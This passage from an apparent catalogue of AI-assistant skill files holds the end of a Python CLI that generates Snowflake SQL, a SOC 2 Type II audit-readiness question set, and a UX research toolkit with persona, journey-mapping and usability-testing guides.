merge_p.add_argument("--source", required=True, help="Source table name")
merge_p.add_argument("--key", required=True, help="Join key column")
merge_p.add_argument(
"--columns", required=True, help="Comma-separated columns to merge"
)
merge_p.add_argument("--schema", help="Schema prefix (e.g., my_db.my_schema)")
# Dynamic Table subcommand
dt_p = subparsers.add_parser(
"dynamic-table", help="Generate Dynamic Table DDL"
)
dt_p.add_argument("--name", required=True, help="Dynamic Table name")
dt_p.add_argument("--warehouse", required=True, help="Warehouse for refresh")
dt_p.add_argument(
"--lag", required=True, help="Target lag (e.g., '5 minutes', '1 hour')"
)
dt_p.add_argument("--source", help="Source table name")
dt_p.add_argument("--columns", help="Comma-separated column list")
dt_p.add_argument("--schema", help="Schema prefix")
# Grant subcommand
grant_p = subparsers.add_parser("grant", help="Generate RBAC grant statements")
grant_p.add_argument("--role", required=True, help="Role to grant to")
grant_p.add_argument("--database", required=True, help="Database name")
grant_p.add_argument(
"--schemas", required=True, help="Comma-separated schema names"
)
grant_p.add_argument(
"--privileges",
required=True,
help="Comma-separated privileges (SELECT, INSERT, UPDATE, DELETE, CREATE TABLE, etc.)",
)
args = parser.parse_args()
if not args.command:
parser.print_help()
sys.exit(1)
if args.command == "merge":
cols = [c.strip() for c in args.columns.split(",")]
sql = generate_merge(args.target, args.source, args.key, cols, args.schema)
elif args.command == "dynamic-table":
cols = [c.strip() for c in args.columns.split(",")] if args.columns else None
sql = generate_dynamic_table(
args.name, args.warehouse, args.lag, args.source, cols, args.schema
)
elif args.command == "grant":
schemas = [s.strip() for s in args.schemas.split(",")]
privs = [p.strip() for p in args.privileges.split(",")]
sql = generate_grants(args.role, args.database, schemas, privs)
else:
parser.print_help()
sys.exit(1)
if args.json:
output = {"command": args.command, "sql": sql}
print(json.dumps(output, indent=2))
else:
print(sql)
if __name__ == "__main__":
main()
Đánh giá mức sẵn sàng SOC 2 Type II qua 6 câu hỏi buộc phải trả lời, tập trung vào giai đoạn quan sát.
--- name: "soc2-audit-prep" description: "/cs:soc2-audit-prep <scope> — SOC 2 Type II readiness 6-question forcing interrogation. Observation-period focused. Use before Type II observation begins, mid-period checkpoint, or pre-field-test month-10 readiness." --- # /cs:soc2-audit-prep — SOC 2 Type II Forcing Questions **Command:** `/cs:soc2-audit-prep <scope>` The SOC 2 Type II auditor pressure-tests any SOC 2 work. Six observation-period-disciplined questions before any Type II cycle. ## When to Run - Pre-observation period (months 1-2 of cycle) - Mid-observation period (month 6 checkpoint) - Pre-field-test (month 10) - Post-report (planning next cycle) - After scope change (adding TSC category) - After major incident during observation period ## The Six SOC 2 Type II Questions ### 1. What's the scope, and which TSC categories are in? **Security always required; others elective based on customer ask.** - Common Criteria (CC1-CC9) under Security always - Availability (A1): for SaaS with SLA commitments - Processing Integrity (PI1): for systems processing transactional / financial data - Confidentiality (C1): for systems handling proprietary / confidential data - Privacy (P1-P8): for systems handling personal data (overlap with GDPR if applicable) - AICPA AT-C 205 description of system: complete + accurate + boundaries clear ### 2. Did any control skip a cycle during observation period? **Type II requires consistent operation — single skipped cycle = likely exception.** - Quarterly controls (e.g., access reviews): all 4 quarters covered - Monthly controls (e.g., vulnerability scans): all months covered - Continuous controls (e.g., logging): no gaps during period - Annual controls (e.g., BCP exercises, training): completed within period ### 3. Show me the change-management evidence for any control implemented mid-period. **Mid-period changes = high audit risk.** - New controls implemented during observation: documented with change-management - Modified controls: rationale + effective date + impact on prior samples - Removed controls: rationale + customer impact assessment - Strategy: avoid mid-period changes; defer to next cycle ### 4. Where's the exception log, and what's the materiality assessment? **Real-time exception logging — not retroactive.** - Each exception logged when discovered, not at audit time - Per exception: what / when / impact / remediation / owner - Materiality assessment: does the exception affect overall control operation? - Audit firm threshold: typically 1-2 exceptions per control acceptable; 3+ = finding ### 5. Show me sample evidence from each TSC criterion in the FIRST month of observation. **Not the last week — the first month.** - Audit firm samples across the observation period - Front-loaded evidence demonstrates operational discipline - Back-loaded evidence (last 30 days) = "scrambling" signal - Sample IDs should be reproducible from operational systems ### 6. What's the cross-walk to ISO 27001, and which evidence reuses? **75% control overlap — the canonical pair.** - Run `cross_framework_mapper.py` for HIGH-confidence overlap themes - Each shared artefact cited by both audits (one collection, two reports) - Coordinate audit calendar with cs-ciso-iso27001 - Avoid producing duplicate evidence files for same control ## Workflow ```bash # 1. Scoping + gap analysis (pre-observation) python ../../ra-qm-team/skills/soc2-compliance/scripts/gap_analyzer.py current_state.json # 2. Control matrix with ISO 27001 cross-walk python ../../ra-qm-team/skills/soc2-compliance/scripts/control_matrix_builder.py program.json # 3. Continuous evidence tracking (during observation) python ../../ra-qm-team/skills/soc2-compliance/scripts/evidence_tracker.py evidence_log.json # 4. Mock audit (pre-field-test month 10) python ../../skills/compliance-os/scripts/audit_simulator.py soc2_scope.json ``` ## Output Format ```markdown # SOC 2 Type II Audit Prep: <scope> **Date:** YYYY-MM-DD **Observation Period:** YYYY-MM-DD to YYYY-MM-DD ## The Decision Being Made [scoping | pre-observation | observation-status | pre-field | report-response] ## TSC Scope - Security: included - Availability: <yes/no> - Processing Integrity: <yes/no> - Confidentiality: <yes/no> - Privacy: <yes/no> ## Observation Period Status - Months elapsed: N / 12 - Controls operated consistently: % of total - Cycle skips identified: <list> - Mid-period control changes: N (each documented with change-mgmt: yes/no) ## Exception Log - Total exceptions logged: N - Per-control max exceptions: M (audit firm tolerance: typically 1-2) - Material exceptions (overall control affected): <list> - Remediation status per exception: complete/in-progress ## Sample Evidence Coverage - Month 1-3 evidence: complete/gaps - Month 4-6 evidence: complete/gaps - Month 7-9 evidence: complete/gaps - Month 10-12 evidence: complete/gaps (only for pre-report status) ## ISO 27001 Cross-Walk Reuse - HIGH-confidence overlap themes: N - Shared artefacts in evidence pool: <count> - Duplicate evidence collection avoided: % savings ## Audit Firm Readiness - Scoping discussion: complete/pending - Description of system per AT-C 205: complete/pending - Walkthrough rehearsal: complete/pending - Sample preparation: complete/pending ## Verdict 🟢 ON-TRACK | 🟡 NEEDS-ATTENTION | 🔴 MATERIAL-RISK ## Top 3 Actions [3 concrete next steps with owner + observation-period timing] ``` ## Routing - `/cs:compliance-readiness` — for multi-framework view - `/cs:iso27001-audit-prep` — for ISO 27001 cross-walk pair (75% overlap) - `/cs:gdpr-audit-prep` — for Privacy TSC overlap - `/cs:ciso-review` — for executive cybersecurity strategy ## Related - Agent: [`cs-soc2-auditor`](../../agents/cs-soc2-auditor.md) - Skill: [`soc2-compliance`](../../../ra-qm-team/skills/soc2-compliance/SKILL.md) - Playbook: [soc2_audit_playbook.md](../../../ra-qm-team/skills/soc2-compliance/references/soc2_audit_playbook.md) - Adjacent: `../iso27001-audit-prep/`, `../gdpr-audit-prep/`, `../compliance-readiness/` --- **Version:** 1.0.0
Bộ công cụ nghiên cứu UX: tạo persona từ dữ liệu, journey map, khung kiểm thử khả dụng và tổng hợp nghiên cứu.
---
name: "ux-researcher-designer"
description: UX research and design toolkit for Senior UX Designer/Researcher including data-driven persona generation, journey mapping, usability testing frameworks, and research synthesis. Use for user research, persona creation, journey mapping, and design validation.
---
# UX Researcher & Designer
Generate user personas from research data, create journey maps, plan usability tests, and synthesize research findings into actionable design recommendations.
---
## Table of Contents
- [Trigger Terms](#trigger-terms)
- [Workflows](#workflows)
- [Workflow 1: Generate User Persona](#workflow-1-generate-user-persona)
- [Workflow 2: Create Journey Map](#workflow-2-create-journey-map)
- [Workflow 3: Plan Usability Test](#workflow-3-plan-usability-test)
- [Workflow 4: Synthesize Research](#workflow-4-synthesize-research)
- [Tool Reference](#tool-reference)
- [Quick Reference Tables](#quick-reference-tables)
- [Knowledge Base](#knowledge-base)
---
## Trigger Terms
Use this skill when you need to:
- "create user persona"
- "generate persona from data"
- "build customer journey map"
- "map user journey"
- "plan usability test"
- "design usability study"
- "analyze user research"
- "synthesize interview findings"
- "identify user pain points"
- "define user archetypes"
- "calculate research sample size"
- "create empathy map"
- "identify user needs"
---
## Workflows
### Workflow 1: Generate User Persona
**Situation:** You have user data (analytics, surveys, interviews) and need to create a research-backed persona.
**Steps:**
1. **Prepare user data**
Required format (JSON):
```json
[
{
"user_id": "user_1",
"age": 32,
"usage_frequency": "daily",
"features_used": ["dashboard", "reports", "export"],
"primary_device": "desktop",
"usage_context": "work",
"tech_proficiency": 7,
"pain_points": ["slow loading", "confusing UI"]
}
]
```
2. **Run persona generator**
```bash
# Human-readable output
python scripts/persona_generator.py
# JSON output for integration
python scripts/persona_generator.py json
```
3. **Review generated components**
| Component | What to Check |
|-----------|---------------|
| Archetype | Does it match the data patterns? |
| Demographics | Are they derived from actual data? |
| Goals | Are they specific and actionable? |
| Frustrations | Do they include frequency counts? |
| Design implications | Can designers act on these? |
4. **Validate persona**
- Show to 3-5 real users: "Does this sound like you?"
- Cross-check with support tickets
- Verify against analytics data
5. **Reference:** See `references/persona-methodology.md` for validity criteria
---
### Workflow 2: Create Journey Map
**Situation:** You need to visualize the end-to-end user experience for a specific goal.
**Steps:**
1. **Define scope**
| Element | Description |
|---------|-------------|
| Persona | Which user type |
| Goal | What they're trying to achieve |
| Start | Trigger that begins journey |
| End | Success criteria |
| Timeframe | Hours/days/weeks |
2. **Gather journey data**
Sources:
- User interviews (ask "walk me through...")
- Session recordings
- Analytics (funnel, drop-offs)
- Support tickets
3. **Map the stages**
Typical B2B SaaS stages:
```
Awareness → Evaluation → Onboarding → Adoption → Advocacy
```
4. **Fill in layers for each stage**
```
Stage: [Name]
├── Actions: What does user do?
├── Touchpoints: Where do they interact?
├── Emotions: How do they feel? (1-5)
├── Pain Points: What frustrates them?
└── Opportunities: Where can we improve?
```
5. **Identify opportunities**
Priority Score = Frequency × Severity × Solvability
6. **Reference:** See `references/journey-mapping-guide.md` for templates
---
### Workflow 3: Plan Usability Test
**Situation:** You need to validate a design with real users.
**Steps:**
1. **Define research questions**
Transform vague goals into testable questions:
| Vague | Testable |
|-------|----------|
| "Is it easy to use?" | "Can users complete checkout in <3 min?" |
| "Do users like it?" | "Will users choose Design A or B?" |
| "Does it make sense?" | "Can users find settings without hints?" |
2. **Select method**
| Method | Participants | Duration | Best For |
|--------|--------------|----------|----------|
| Moderated remote | 5-8 | 45-60 min | Deep insights |
| Unmoderated remote | 10-20 | 15-20 min | Quick validation |
| Guerrilla | 3-5 | 5-10 min | Rapid feedback |
3. **Design tasks**
Good task format:
```
SCENARIO: "Imagine you're planning a trip to Paris..."
GOAL: "Book a hotel for 3 nights in your budget."
SUCCESS: "You see the confirmation page."
```
Task progression: Warm-up → Core → Secondary → Edge case → Free exploration
4. **Define success metrics**
| Metric | Target |
|--------|--------|
| Completion rate | >80% |
| Time on task | <2× expected |
| Error rate | <15% |
| Satisfaction | >4/5 |
5. **Prepare moderator guide**
- Think-aloud instructions
- Non-leading prompts
- Post-task questions
6. **Reference:** See `references/usability-testing-frameworks.md` for full guide
---
### Workflow 4: Synthesize Research
**Situation:** You have raw research data (interviews, surveys, observations) and need actionable insights.
**Steps:**
1. **Code the data**
Tag each data point:
- `[GOAL]` - What they want to achieve
- `[PAIN]` - What frustrates them
- `[BEHAVIOR]` - What they actually do
- `[CONTEXT]` - When/where they use product
- `[QUOTE]` - Direct user words
2. **Cluster similar patterns**
```
User A: Uses daily, advanced features, shortcuts
User B: Uses daily, complex workflows, automation
User C: Uses weekly, basic needs, occasional
Cluster 1: A, B (Power Users)
Cluster 2: C (Casual User)
```
3. **Calculate segment sizes**
| Cluster | Users | % | Viability |
|---------|-------|---|-----------|
| Power Users | 18 | 36% | Primary persona |
| Business Users | 15 | 30% | Primary persona |
| Casual Users | 12 | 24% | Secondary persona |
4. **Extract key findings**
For each theme:
- Finding statement
- Supporting evidence (quotes, data)
- Frequency (X/Y participants)
- Business impact
- Recommendation
5. **Prioritize opportunities**
| Factor | Score 1-5 |
|--------|-----------|
| Frequency | How often does this occur? |
| Severity | How much does it hurt? |
| Breadth | How many users affected? |
| Solvability | Can we fix this? |
6. **Reference:** See `references/persona-methodology.md` for analysis framework
---
## Tool Reference
### persona_generator.py
Generates data-driven personas from user research data.
| Argument | Values | Default | Description |
|----------|--------|---------|-------------|
| format | (none), json | (none) | Output format |
**Sample Output:**
```
============================================================
PERSONA: Alex the Power User
============================================================
📝 A daily user who primarily uses the product for work purposes
Archetype: Power User
Quote: "I need tools that can keep up with my workflow"
👤 Demographics:
• Age Range: 25-34
• Location Type: Urban
• Tech Proficiency: Advanced
🎯 Goals & Needs:
• Complete tasks efficiently
• Automate workflows
• Access advanced features
😤 Frustrations:
• Slow loading times (14/20 users)
• No keyboard shortcuts
• Limited API access
💡 Design Implications:
→ Optimize for speed and efficiency
→ Provide keyboard shortcuts and power features
→ Expose API and automation capabilities
📈 Data: Based on 45 users
Confidence: High
```
**Archetypes Generated:**
| Archetype | Signals | Design Focus |
|-----------|---------|--------------|
| power_user | Daily use, 10+ features | Efficiency, customization |
| casual_user | Weekly use, 3-5 features | Simplicity, guidance |
| business_user | Work context, team use | Collaboration, reporting |
| mobile_first | Mobile primary | Touch, offline, speed |
**Output Components:**
| Component | Description |
|-----------|-------------|
| demographics | Age range, location, occupation, tech level |
| psychographics | Motivations, values, attitudes, lifestyle |
| behaviors | Usage patterns, feature preferences |
| needs_and_goals | Primary, secondary, functional, emotional |
| frustrations | Pain points with evidence |
| scenarios | Contextual usage stories |
| design_implications | Actionable recommendations |
| data_points | Sample size, confidence level |
---
## Quick Reference Tables
### Research Method Selection
| Question Type | Best Method | Sample Size |
|---------------|-------------|-------------|
| "What do users do?" | Analytics, observation | 100+ events |
| "Why do they do it?" | Interviews | 8-15 users |
| "How well can they do it?" | Usability test | 5-8 users |
| "What do they prefer?" | Survey, A/B test | 50+ users |
| "What do they feel?" | Diary study, interviews | 10-15 users |
### Persona Confidence Levels
| Sample Size | Confidence | Use Case |
|-------------|------------|----------|
| 5-10 users | Low | Exploratory |
| 11-30 users | Medium | Directional |
| 31+ users | High | Production |
### Usability Issue Severity
| Severity | Definition | Action |
|----------|------------|--------|
| 4 - Critical | Prevents task completion | Fix immediately |
| 3 - Major | Significant difficulty | Fix before release |
| 2 - Minor | Causes hesitation | Fix when possible |
| 1 - Cosmetic | Noticed but not problematic | Low priority |
### Interview Question Types
| Type | Example | Use For |
|------|---------|---------|
| Context | "Walk me through your typical day" | Understanding environment |
| Behavior | "Show me how you do X" | Observing actual actions |
| Goals | "What are you trying to achieve?" | Uncovering motivations |
| Pain | "What's the hardest part?" | Identifying frustrations |
| Reflection | "What would you change?" | Generating ideas |
---
## Knowledge Base
Detailed reference guides in `references/`:
| File | Content |
|------|---------|
| `persona-methodology.md` | Validity criteria, data collection, analysis framework |
| `journey-mapping-guide.md` | Mapping process, templates, opportunity identification |
| `example-personas.md` | 3 complete persona examples with data |
| `usability-testing-frameworks.md` | Test planning, task design, analysis |
---
## Validation Checklist
### Persona Quality
- [ ] Based on 20+ users (minimum)
- [ ] At least 2 data sources (quant + qual)
- [ ] Specific, actionable goals
- [ ] Frustrations include frequency counts
- [ ] Design implications are specific
- [ ] Confidence level stated
### Journey Map Quality
- [ ] Scope clearly defined (persona, goal, timeframe)
- [ ] Based on real user data, not assumptions
- [ ] All layers filled (actions, touchpoints, emotions)
- [ ] Pain points identified per stage
- [ ] Opportunities prioritized
### Usability Test Quality
- [ ] Research questions are testable
- [ ] Tasks are realistic scenarios, not instructions
- [ ] 5+ participants per design
- [ ] Success metrics defined
- [ ] Findings include severity ratings
### Research Synthesis Quality
- [ ] Data coded consistently
- [ ] Patterns based on 3+ data points
- [ ] Findings include evidence
- [ ] Recommendations are actionable
- [ ] Priorities justified
## Related Skills
- **UI Design System** (`product-team/ui-design-system/`) — Research findings inform design system decisions
- **Product Manager Toolkit** (`product-team/product-manager-toolkit/`) — Customer interview analysis complements persona research
FILE:assets/research_plan_template.md
# UX Research Plan
## Study Info
| Field | Value |
|-------|-------|
| **Study Name** | [Descriptive name] |
| **Researcher** | [Name] |
| **Stakeholders** | [Names/roles] |
| **Status** | Planning / In Field / Analysis / Complete |
| **Timeline** | [Start Date] - [End Date] |
---
## Research Questions
What do we need to learn? List 3-5 specific, answerable questions.
1. [Primary question - the most important thing to learn]
2. [Secondary question]
3. [Secondary question]
4. [Exploratory question - nice to know]
5. [Exploratory question - nice to know]
### What We Already Know
[Summarize existing knowledge, past research, analytics data, assumptions to validate.]
### What We Do Not Know
[List specific knowledge gaps this study will address.]
---
## Methodology
**Method:** [Usability Testing / User Interviews / Survey / Diary Study / Card Sorting / A/B Test / Contextual Inquiry]
**Justification:** [Why this method is appropriate for the research questions.]
**Approach:** [Moderated / Unmoderated / Remote / In-Person]
**Duration:** [Session length per participant]
**Tools:** [Platform/tools used - e.g., Lookback, Maze, UserTesting, Zoom]
---
## Participant Criteria
### Target Participants
| Criterion | Requirement |
|-----------|------------|
| **User type** | [e.g., Active users, churned users, prospects] |
| **Role/title** | [e.g., Product managers, developers] |
| **Experience level** | [e.g., 1+ years using similar products] |
| **Company size** | [e.g., 50-500 employees] |
| **Geography** | [e.g., US-based, English-speaking] |
### Screening Questions
1. [Question to verify participant meets criteria]
2. [Question to verify participant meets criteria]
3. [Question to ensure diversity of perspectives]
### Exclusion Criteria
- [e.g., Current employees or family of employees]
- [e.g., Participants in a study within the last 6 months]
### Sample Size
- **Target:** [Number] participants
- **Justification:** [e.g., "5 participants identify ~80% of usability issues" or "Statistical significance requires N=200 for survey"]
---
## Recruitment Plan
| Channel | Target Count | Timeline | Incentive |
|---------|-------------|----------|-----------|
| [Customer database] | [N] | [Dates] | [$Amount or type] |
| [User panel] | [N] | [Dates] | [$Amount or type] |
| [Social media] | [N] | [Dates] | [$Amount or type] |
### Incentive
- **Amount:** [$X per session or equivalent]
- **Form:** [Gift card, account credit, donation to charity]
- **Distribution:** [Immediately after session / within 5 business days]
---
## Interview / Test Guide
### Introduction (5 minutes)
- Welcome and thank participant
- Explain purpose (learning, not testing them)
- Confirm consent and recording permission
- Set expectations for session duration
### Warm-Up Questions (5 minutes)
1. [Background question about their role/context]
2. [Question about current workflow/tools]
### Core Tasks / Questions (30-40 minutes)
**Task 1:** [Description of task or topic area]
- [Specific prompt or scenario]
- [Follow-up probes]
**Task 2:** [Description of task or topic area]
- [Specific prompt or scenario]
- [Follow-up probes]
**Task 3:** [Description of task or topic area]
- [Specific prompt or scenario]
- [Follow-up probes]
### Wrap-Up (5 minutes)
- Overall impressions
- Anything we did not ask about that they want to share
- Thank participant and explain next steps
---
## Analysis Framework
### Data Collection
- [ ] Session recordings stored securely
- [ ] Notes taken during each session
- [ ] Observations tagged by research question
### Analysis Method
- **Affinity mapping:** Group observations into themes
- **Task success rate:** [For usability tests] Completion rate per task
- **Severity rating:** [For issues] Critical / Major / Minor / Cosmetic
- **Quantitative analysis:** [For surveys] Statistical analysis plan
### Synthesis Approach
1. Review all session notes and recordings
2. Identify patterns and themes across participants
3. Map findings to research questions
4. Prioritize findings by impact and frequency
5. Develop actionable recommendations
---
## Timeline
| Phase | Dates | Activities |
|-------|-------|-----------|
| Planning | [Week 1] | Finalize plan, create guide, prepare materials |
| Recruitment | [Week 1-2] | Screen and schedule participants |
| Fieldwork | [Week 2-3] | Conduct sessions |
| Analysis | [Week 3-4] | Synthesize findings |
| Reporting | [Week 4] | Create report, present to stakeholders |
---
## Deliverables
- [ ] Research findings report (key insights, evidence, recommendations)
- [ ] Presentation deck for stakeholders
- [ ] Highlight reel of key moments (if recorded)
- [ ] Actionable recommendations prioritized by impact
- [ ] Raw data archive (notes, recordings) stored per data policy
FILE:references/example-personas.md
# Example Personas
Real output examples showing what good personas look like.
---
## Table of Contents
- [Example 1: Power User Persona](#example-1-power-user-persona)
- [Example 2: Business User Persona](#example-2-business-user-persona)
- [Example 3: Casual User Persona](#example-3-casual-user-persona)
- [JSON Output Format](#json-output-format)
- [Quality Checklist](#quality-checklist)
---
## Example 1: Power User Persona
### Script Output
```
============================================================
PERSONA: Alex the Power User
============================================================
📝 A daily user who primarily uses the product for work purposes
Archetype: Power User
Quote: "I need tools that can keep up with my workflow"
👤 Demographics:
• Age Range: 25-34
• Location Type: Urban
• Occupation Category: Software Engineer
• Education Level: Bachelor's degree
• Tech Proficiency: Advanced
🧠 Psychographics:
Motivations: Efficiency, Control, Mastery
Values: Time-saving, Flexibility, Reliability
Lifestyle: Fast-paced, optimization-focused
🎯 Goals & Needs:
• Complete tasks efficiently without repetitive work
• Automate recurring workflows
• Access advanced features and shortcuts
😤 Frustrations:
• Slow loading times (mentioned by 14/20 users)
• No keyboard shortcuts for common actions
• Limited API access for automation
📊 Behaviors:
• Frequently uses: Dashboard, Reports, Export, API
• Usage pattern: 5+ sessions per day
• Interaction style: Exploratory - uses many features
💡 Design Implications:
→ Optimize for speed and efficiency
→ Provide keyboard shortcuts and power features
→ Expose API and automation capabilities
→ Allow UI customization
📈 Data: Based on 45 users
Confidence: High
Method: Quantitative analysis + 12 qualitative interviews
```
### Data Behind This Persona
**Quantitative Data (n=45):**
- 78% use product daily
- Average session: 23 minutes
- Average features used: 12
- 84% access via desktop
- Support tickets: 0.2 per month (low)
**Qualitative Insights (12 interviews):**
| Theme | Frequency | Sample Quote |
|-------|-----------|--------------|
| Speed matters | 10/12 | "Every second counts when I'm in flow" |
| Shortcuts wanted | 8/12 | "Why can't I Cmd+K to search?" |
| Automation need | 9/12 | "I wrote a script to work around..." |
| Customization | 7/12 | "Let me hide features I don't use" |
---
## Example 2: Business User Persona
### Script Output
```
============================================================
PERSONA: Taylor the Business Professional
============================================================
📝 A weekly user who primarily uses the product for team collaboration
Archetype: Business User
Quote: "I need to show clear value to my stakeholders"
👤 Demographics:
• Age Range: 35-44
• Location Type: Urban/Suburban
• Occupation Category: Product Manager
• Education Level: MBA
• Tech Proficiency: Intermediate
🧠 Psychographics:
Motivations: Team success, Visibility, Recognition
Values: Collaboration, Measurable outcomes, Professional growth
Lifestyle: Meeting-heavy, cross-functional work
🎯 Goals & Needs:
• Improve team efficiency and coordination
• Generate reports for stakeholders
• Integrate with existing work tools (Slack, Jira)
😤 Frustrations:
• No way to share views with team (11/18 users)
• Can't generate executive summaries
• No SSO - team has to manage passwords
📊 Behaviors:
• Frequently uses: Sharing, Reports, Team Dashboard
• Usage pattern: 3-4 sessions per week
• Interaction style: Goal-oriented, feature-specific
💡 Design Implications:
→ Add collaboration and sharing features
→ Build executive reporting and dashboards
→ Integrate with enterprise tools (SSO, Slack)
→ Provide permission and access controls
📈 Data: Based on 38 users
Confidence: High
Method: Survey (n=200) + 18 interviews
```
### Data Behind This Persona
**Survey Data (n=200):**
- 19% of total user base fits this profile
- Average company size: 50-500 employees
- 72% need to share outputs with non-users
- Top request: Team collaboration features
**Interview Insights (18 interviews):**
| Need | Frequency | Business Impact |
|------|-----------|-----------------|
| Reporting | 16/18 | "I spend 2hrs/week making slides" |
| Team access | 14/18 | "Can't show my team what I see" |
| Integration | 12/18 | "Copy-paste into Confluence..." |
| SSO | 11/18 | "IT won't approve without SSO" |
### Scenario: Quarterly Review Prep
```
Context: End of quarter, needs to present metrics to leadership
Goal: Create compelling data story in 30 minutes
Current Journey:
1. Export raw data (works)
2. Open Excel, make charts (manual)
3. Copy to PowerPoint (manual)
4. Share with team for feedback (via email)
Pain Points:
• No built-in presentation view
• Charts don't match brand guidelines
• Can't collaborate on narrative
Opportunity:
• One-click executive summary
• Brand-compliant templates
• In-app commenting on reports
```
---
## Example 3: Casual User Persona
### Script Output
```
============================================================
PERSONA: Casey the Casual User
============================================================
📝 A monthly user who uses the product for occasional personal tasks
Archetype: Casual User
Quote: "I just want it to work without having to think about it"
👤 Demographics:
• Age Range: 25-44
• Location Type: Mixed
• Occupation Category: Various
• Education Level: Bachelor's degree
• Tech Proficiency: Beginner-Intermediate
🧠 Psychographics:
Motivations: Task completion, Simplicity
Values: Ease of use, Quick results
Lifestyle: Busy, product is means to end
🎯 Goals & Needs:
• Complete specific task quickly
• Minimal learning curve
• Don't have to remember how it works between uses
😤 Frustrations:
• Too many options, don't know where to start (18/25)
• Forgot how to do X since last time (15/25)
• Feels like it's designed for experts (12/25)
📊 Behaviors:
• Frequently uses: 2-3 core features only
• Usage pattern: 1-2 sessions per month
• Interaction style: Focused - uses minimal features
💡 Design Implications:
→ Simplify onboarding and main navigation
→ Provide contextual help and reminders
→ Don't require memorization between sessions
→ Progressive disclosure - hide advanced features
📈 Data: Based on 52 users
Confidence: High
Method: Analytics analysis + 25 intercept interviews
```
### Data Behind This Persona
**Analytics Data (n=1,200 casual segment):**
- 65% of users are casual (< 1 session/week)
- Average features used: 2.3
- Return rate after 30 days: 34%
- Session duration: 4.2 minutes
**Intercept Interview Insights (25 quick interviews):**
| Quote | Count | Implication |
|-------|-------|-------------|
| "Where's the thing I used last time?" | 18 | Need breadcrumbs/history |
| "There's so much here" | 15 | Simplify main view |
| "I only need to do X" | 22 | Surface common tasks |
| "Is there a tutorial?" | 11 | Better help system |
### Journey: Infrequent Task Completion
```
Stage 1: Return After Absence
Action: Opens app, doesn't recognize interface
Emotion: 😕 Confused
Thought: "This looks different, where do I start?"
Stage 2: Feature Hunt
Action: Clicks around looking for needed feature
Emotion: 😕 Frustrated
Thought: "I know I did this before..."
Stage 3: Discovery
Action: Finds feature (or gives up)
Emotion: 😐 Relief or 😠 Abandonment
Thought: "Finally!" or "I'll try something else"
Stage 4: Task Completion
Action: Uses feature, accomplishes goal
Emotion: 🙂 Satisfied
Thought: "That worked, hope I remember next time"
```
---
## JSON Output Format
### persona_generator.py JSON Output
```json
{
"name": "Alex the Power User",
"archetype": "power_user",
"tagline": "A daily user who primarily uses the product for work purposes",
"demographics": {
"age_range": "25-34",
"location_type": "urban",
"occupation_category": "Software Engineer",
"education_level": "Bachelor's degree",
"tech_proficiency": "Advanced"
},
"psychographics": {
"motivations": ["Efficiency", "Control", "Mastery"],
"values": ["Time-saving", "Flexibility", "Reliability"],
"attitudes": ["Early adopter", "Optimization-focused"],
"lifestyle": "Fast-paced, tech-forward"
},
"behaviors": {
"usage_patterns": ["daily: 45 users", "weekly: 8 users"],
"feature_preferences": ["dashboard", "reports", "export", "api"],
"interaction_style": "Exploratory - uses many features",
"learning_preference": "Self-directed, documentation"
},
"needs_and_goals": {
"primary_goals": [
"Complete tasks efficiently",
"Automate workflows"
],
"secondary_goals": [
"Customize workspace",
"Integrate with other tools"
],
"functional_needs": [
"Speed and performance",
"Keyboard shortcuts",
"API access"
],
"emotional_needs": [
"Feel in control",
"Feel productive",
"Feel like an expert"
]
},
"frustrations": [
"Slow loading times",
"No keyboard shortcuts",
"Limited API access",
"Can't customize dashboard",
"No batch operations"
],
"scenarios": [
{
"title": "Bulk Processing",
"context": "Monday morning, needs to process week's data",
"goal": "Complete batch operations quickly",
"steps": ["Import data", "Apply bulk actions", "Export results"],
"pain_points": ["No keyboard shortcuts", "Slow processing"]
}
],
"quote": "I need tools that can keep up with my workflow",
"data_points": {
"sample_size": 45,
"confidence_level": "High",
"last_updated": "2024-01-15",
"validation_method": "Quantitative analysis + Qualitative interviews"
},
"design_implications": [
"Optimize for speed and efficiency",
"Provide keyboard shortcuts and power features",
"Expose API and automation capabilities",
"Allow UI customization",
"Support bulk operations"
]
}
```
### Using JSON Output
```bash
# Generate JSON for integration
python scripts/persona_generator.py json > persona_power_user.json
# Use with other tools
cat persona_power_user.json | jq '.design_implications'
```
---
## Quality Checklist
### What Makes a Good Persona
| Criterion | Bad Example | Good Example |
|-----------|-------------|--------------|
| **Specificity** | "Wants to be productive" | "Needs to process 50+ items daily" |
| **Evidence** | "Users want simplicity" | "18/25 users said 'too many options'" |
| **Actionable** | "Likes easy things" | "Hide advanced features by default" |
| **Memorable** | Generic descriptions | Distinctive quote and archetype |
| **Validated** | Team assumptions | User interviews + analytics |
### Persona Quality Rubric
| Element | Points | Criteria |
|---------|--------|----------|
| Data-backed demographics | /5 | From real user data |
| Specific goals | /5 | Actionable, measurable |
| Evidenced frustrations | /5 | With frequency counts |
| Design implications | /5 | Directly usable by designers |
| Authentic quote | /5 | From actual user |
| Confidence stated | /5 | Sample size and method |
**Score:**
- 25-30: Production-ready persona
- 18-24: Needs refinement
- Below 18: Requires more research
### Red Flags in Persona Output
| Red Flag | What It Means |
|----------|---------------|
| No sample size | Ungrounded assumptions |
| Generic frustrations | Didn't do user research |
| All positive | Missing real pain points |
| No quotes | No qualitative research |
| Contradicting behaviors | Forced archetype |
| "Everyone" language | Too broad to be useful |
---
*See also: `persona-methodology.md` for creation process*
FILE:references/journey-mapping-guide.md
# Journey Mapping Guide
Step-by-step reference for creating user journey maps that drive design decisions.
---
## Table of Contents
- [Journey Map Fundamentals](#journey-map-fundamentals)
- [Mapping Process](#mapping-process)
- [Journey Stages](#journey-stages)
- [Touchpoint Analysis](#touchpoint-analysis)
- [Emotion Mapping](#emotion-mapping)
- [Opportunity Identification](#opportunity-identification)
- [Templates](#templates)
---
## Journey Map Fundamentals
### What Is a Journey Map?
A journey map visualizes the end-to-end experience a user has while trying to accomplish a goal with your product or service.
```
┌─────────────────────────────────────────────────────────────┐
│ JOURNEY MAP STRUCTURE │
├─────────────────────────────────────────────────────────────┤
│ │
│ STAGES: Awareness → Consideration → Acquisition → │
│ Onboarding → Regular Use → Advocacy │
│ │
│ LAYERS: ┌─────────────────────────────────────────┐ │
│ │ Actions: What user does │ │
│ ├─────────────────────────────────────────┤ │
│ │ Touchpoints: Where interaction happens │ │
│ ├─────────────────────────────────────────┤ │
│ │ Emotions: How user feels │ │
│ ├─────────────────────────────────────────┤ │
│ │ Pain Points: What frustrates │ │
│ ├─────────────────────────────────────────┤ │
│ │ Opportunities: Where to improve │ │
│ └─────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────┘
```
### Journey Map Types
| Type | Focus | Best For |
|------|-------|----------|
